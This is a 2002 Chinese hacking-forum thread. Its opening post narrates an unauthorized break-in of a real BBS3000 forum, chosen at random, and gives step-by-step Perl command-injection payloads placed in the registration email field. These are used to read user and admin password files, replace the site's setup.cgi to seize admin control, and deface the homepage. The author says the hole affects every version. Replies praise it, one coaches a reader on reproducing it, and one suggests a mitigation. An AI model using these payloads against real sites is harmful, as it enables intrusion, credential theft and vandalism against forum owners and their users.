>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  我的一次入侵bbs3000取得最高权限
发表文章 发表涂鸦
  回复数:43  点击数:1103 将此页发给您的朋友        
作者 主题: 我的一次入侵bbs3000取得最高权限 ( 页: 1 2 3 ) 回复 | 收藏 | 打印 | 篇末
温柔小刀帅哥哦
级别:一般站友
威望:0
经验:0
货币:186
体力:33.7
来源:61.184.68.*
总发帖数:19
注册日期:2002-06-12
查看 邮件 主页 QQ 消息 引用 复制 下载 

本文为技术文章,欢迎转贴,复制,转贴时请注明版权,有问题请和我联系,email:ctgu@hotmail.com 也可以到我的论坛www.3wcool.com/bbs讨论。

刚看完一篇关于cgi的解析机制的文章,发现了一些漏洞可能可以利用,就拿bbs3000开刀试试。
先上网搜索一个bbs3000的论坛,在google.com键入”bbs/list.cgi“,出来了一大堆,看到一个粘贴美女图的论坛很不爽,就拿你开刀。先注册一用户名为;字符,密码为空格,信箱为
rename "admin.cgi","readme.txt";#@3wcool.com
(这里假设admin为该论坛的社区区长,也就是该论坛最大权限的用户,readme.txt 为自己随便起的一个txt文件),然后我们在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名,下同)
返回的页面显示
'F:\wwwroot\bbs3000\yhzl\;.cgi' script produced no output 后面的就是关键了,再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
admin admin http://x.x.x.x 2002-04-16
显示的内容前面就是密码、用户
天啊,事情怎么那么容易呀!!~_*

再修改资料把信箱改成rename "readme.txt","admin.cgi";#@3wcool.com
这样就可以用admin登入论坛了,之后你就可以,哈哈,不要扔我。
再跑的
http://x.x.x.x/bbs3000/cjyh.cgi输入用户admin,密码admin,我靠,居然不行,区长设置的管理密码和他的用户密码不一样。那好,我看你的setup.cgi里面的密码是什么。
再把我的油箱改成
rename "../setup.cgi","readme.cgi";#@3wcool.com
然后重复上面步骤在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名,下同)
返回的页面显示
'F:\wwwroot\bbs3000\bbs3000\yhzl\;.cgi' script produced no output 后面的就是关键了,再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
$admname="admin";
$delpsd="admin123";
$imagurl="http://x.x.x.x/bbs/image";
$filepath="D:/wwwroot/cgi-bin/bbs";
$ImgDir="D:/wwwroot/bbs/image";
$ym="http://x.x.x.x/cgi-bin/bbs";
…………
……
则管理员帐号为admin,密码为admin123,返回登入管理界面,靠,现在是什么都不行了,因为论坛缺少了setup.cgi这个文件,所有的cgi都打不开了,拿了密码也没有用了。下线,等斑竹自己修复,我还要去背单词,要考试了。(可能你们要问为什么邮箱不用copy "../setup.cgi","readme.cgi";#@3wcool.com,我试过,没用,可能是权限不够)
到了晚上再来看看论坛已经修好了,我不罢休换个思路再来。
我先发表了一篇文章,随便写点,肯定会被删的东西。然后用论坛上传文件的功能,上传了一个bbs3000原程序中的setup.cgi,自己定义好管理员帐号,密码;再改成的read.txt文件,因为后缀是cgi的文件,论坛不支持。发表后查看那个read.txt文件的路径为
http://x.x.x.x/bbs/image/affix/20010615135901.txt
好的, 抄出旧刀,把;的邮箱改成
rename "../../bbs/20010615135901.txt","../setup.cgi";#@3wcool.com
然后在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
好,这下就可以用自己定义的帐号,密码登入管理界面了.
在狠一点,把邮箱改改,上传一个首页把它的首页更换掉。
哈,怎一个爽字了的。
心情好的时候,一口气背了100面单词…………


有几点值得注意的:
1:此漏洞对于目前发行的一切bbs3000版本都通吃。
2:此漏洞只存在与win2000的机子,且cgi是采用应用程序映射:perlIS.dll应用程序映射的,很多空间又支持asp又支持cgi的多为这种。
3:啊,怎么有人比我先注册了;这个用户名,看来已经背他洗劫过一次了,没有关系,换个用户名1;或2;只要最后是;的什么都行,什么斑竹把用户名含;过滤掉了,拿就随便注册一个把邮箱改成
;rename "admin.cgi","readme.txt";#@3wcool.com
前面加一个;号。
好了,告诉大家一句,擅自更改删除别人的数据为违法行为,请大家不要太过分。
by 温柔小刀
2002-6-12

编辑 删除 发表时间发表于 2002-06-12.15:30:31   MSIE 5.01 Windows 2000IP: 已记录
19821119帅哥哦
级别:管 理 员
威望:3
经验:0
货币:6
体力:-0.0437
来源:19821119
总发帖数:1801
注册日期:2002-01-29
查看 邮件 主页 QQ 消息 引用 复制 下载 

建议在Linux系统下安装BBS3000...
----------------------------------------------------------
19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119

编辑 删除 发表时间发表于 2002-06-12.15:33:00   MSIE 5.0 Windows 98IP: 已记录
noreward帅哥哦
级别:骑士
威望:0
经验:0
货币:173
体力:5.6
来源:天津
总发帖数:225
注册日期:2002-02-25
查看 邮件 主页 QQ 消息 引用 复制 下载 

好厉害啊,好久没有这样的文章了,

编辑 删除 发表时间发表于 2002-06-12.15:36:30   MSIE 6.0 Windows 2000IP: 已记录
风流倜傥帅哥哦
级别:高级站友
威望:0
经验:0
货币:718
体力:54.6
来源:china
总发帖数:147
注册日期:2002-05-01
查看 邮件 主页 QQ 消息 引用 复制 下载 

不错的文章
----------------------------------------------------------
[b]●好好学习,天天向上!● COLOR][/u]

编辑 删除 发表时间发表于 2002-06-12.16:06:09   MSIE 5.0 Windows 98IP: 已记录
土匪帅哥哦
级别:中级站友
威望:0
经验:0
货币:377
体力:41.4
来源:61.167.244.*
总发帖数:70
注册日期:2002-02-16
查看 邮件 主页 QQ 消息 引用 复制 下载 

好,好久没有这样好的文章了.........

编辑 删除 发表时间发表于 2002-06-12.16:27:40   MSIE 5.0 Windows 98IP: 已记录
jason0201帅哥哦
级别:本站元老
威望:5
经验:0
货币:4475
体力:100
来源:天津
总发帖数:1483
注册日期:2002-03-26
查看 邮件 主页 QQ 消息 引用 复制 下载 

大体看了一下,不错的文章呀,我也入侵过BBS,所以我知道最重要的是思路,你的思路很独特,向你学习呀,交流一下吧,加我的QQ吧,6169118
----------------------------------------------------------
I AM JASON0201 REMEMBER NEVER TOO LATE TO LEARN


编辑 删除 发表时间发表于 2002-06-12.16:52:48   MSIE 6.0 Windows 98IP: 已记录
特种兵帅哥哦
级别:一般站友
威望:0
经验:0
货币:169
体力:32.8
来源:211.93.167.*
总发帖数:16
注册日期:2002-04-10
查看 邮件 主页 QQ 消息 引用 复制 下载 

好文章!不错!希望能看到更好的文章!

编辑 删除 发表时间发表于 2002-06-12.17:11:14   MSIE 6.0b Windows 98IP: 已记录
无雪帅哥哦
级别:高级站友
威望:0
经验:0
货币:415
体力:40.5
来源:湘港
总发帖数:105
注册日期:2002-02-24
查看 邮件 主页 QQ 消息 引用 复制 下载 

呵呵~
厉害厉害~

编辑 删除 发表时间发表于 2002-06-12.18:09:19   MSIE 6.0 Windows 2000IP: 已记录
zhulo帅哥哦
级别:高级站友
威望:0
经验:0
货币:713
体力:55.1
来源:其它
总发帖数:139
注册日期:2002-04-06
查看 邮件 主页 QQ 消息 引用 复制 下载 

这一步试了几十次都不成功?为什么?
----------------------------------------------------------
朋友的网站 http://www.beijia1982.net 我爱她,所以我只好爱它!

编辑 删除 发表时间发表于 2002-06-12.20:17:17   MSIE 6.0 Windows 2000IP: 已记录
kof2000帅哥哦
级别:光明使者
威望:0
经验:4
货币:5223
体力:98
来源:VisualStudio
总发帖数:2018
注册日期:2002-03-06
查看 邮件 主页 QQ 消息 引用 复制 下载 

珍藏版。。 好久没见这么实用的文章了。。
正好近来在玩一个BBS3000的论坛呢
----------------------------------------------------------
VB/C/C++,网络安全技术...

编辑 删除 发表时间发表于 2002-06-12.20:59:05   MSIE 5.0 Windows 98IP: 已记录
温柔小刀帅哥哦
级别:一般站友
威望:0
经验:0
货币:186
体力:33.7
来源:211.160.244.*
总发帖数:19
注册日期:2002-06-12
查看 邮件 主页 QQ 消息 引用 复制 下载 

[QUOTE]原文由 zhulo 发表:
[B] 这一步试了几十次都不成功?为什么?[/B][/QUOTE]
当你找到一个bbs3000的服务器的时候,在地址栏先敲入
http://x.x.x.x/cgi-bin/bbs3000/yhzl/admin.cgi
admin.cgi为任意一个用户的账号,自己看啦,要是字母的也可以是你的zhulo.cgi
如果返回的是
'F:\wwwroot\bbs3000\yhzl\admin.cgi' script produced no output
或者类似的东西,那就有戏了,一步一步照搬就可以了

编辑 删除 发表时间发表于 2002-06-12.21:16:18   MSIE 5.01 Windows 2000IP: 已记录
KingQi帅哥哦
级别:高级站友
威望:0
经验:0
货币:611
体力:50.7
来源:北京
总发帖数:121
注册日期:2002-06-11
查看 邮件 主页 QQ 消息 引用 复制 下载 

帅。^_^

编辑 删除 发表时间发表于 2002-06-12.21:59:45   MSIE 6.0 Windows 2000IP: 已记录
ghosts帅哥哦
级别:本站元老
威望:0
经验:0
货币:5962
体力:100
来源:218.15.61.*
总发帖数:1661
注册日期:2002-03-14
查看 邮件 主页 QQ 消息 引用 复制 下载 

写得太好了!
是不是你的原创?
----------------------------------------------------------
狙击者的前身就是武者:比利

编辑 删除 发表时间发表于 2002-06-12.23:14:05   MSIE 5.5 Windows 98IP: 已记录
沉睡不醒帅哥哦
级别:老 站 友
威望:0
经验:0
货币:1026
体力:64.2
来源:61.188.195.*
总发帖数:256
注册日期:2002-04-02
查看 邮件 主页 QQ 消息 引用 复制 下载 

我看过类似的文章
用system或者dir注册一样可以。
在iis下,bbs3000漏洞多多。
简单点的办法,去掉不该要的目录的执行权限。

编辑 删除 发表时间发表于 2002-06-12.23:36:53   MSIE 5.0 Windows 98IP: 已记录
sandflee帅哥哦
级别:长 老 级
威望:0
经验:0
货币:38
体力:1.3
来源:黑暗地狱
总发帖数:655
注册日期:2002-01-27
查看 邮件 主页 QQ 消息 引用 复制 下载 

/yhzl/
这个是用户数据库目录?自己猜的?
----------------------------------------------------------
http://www.isgrey.com/

编辑 删除 发表时间发表于 2002-06-13.00:04:13   MSIE 6.0 Windows 2000IP: 已记录
沉睡不醒帅哥哦
级别:老 站 友
威望:0
经验:0
货币:1026
体力:64.2
来源:61.188.195.*
总发帖数:256
注册日期:2002-04-02
查看 邮件 主页 QQ 消息 引用 复制 下载 

那个是默认的

编辑 删除 发表时间发表于 2002-06-13.00:14:01   MSIE 5.0 Windows 98IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符

[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP [第 1 2 3 页]
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题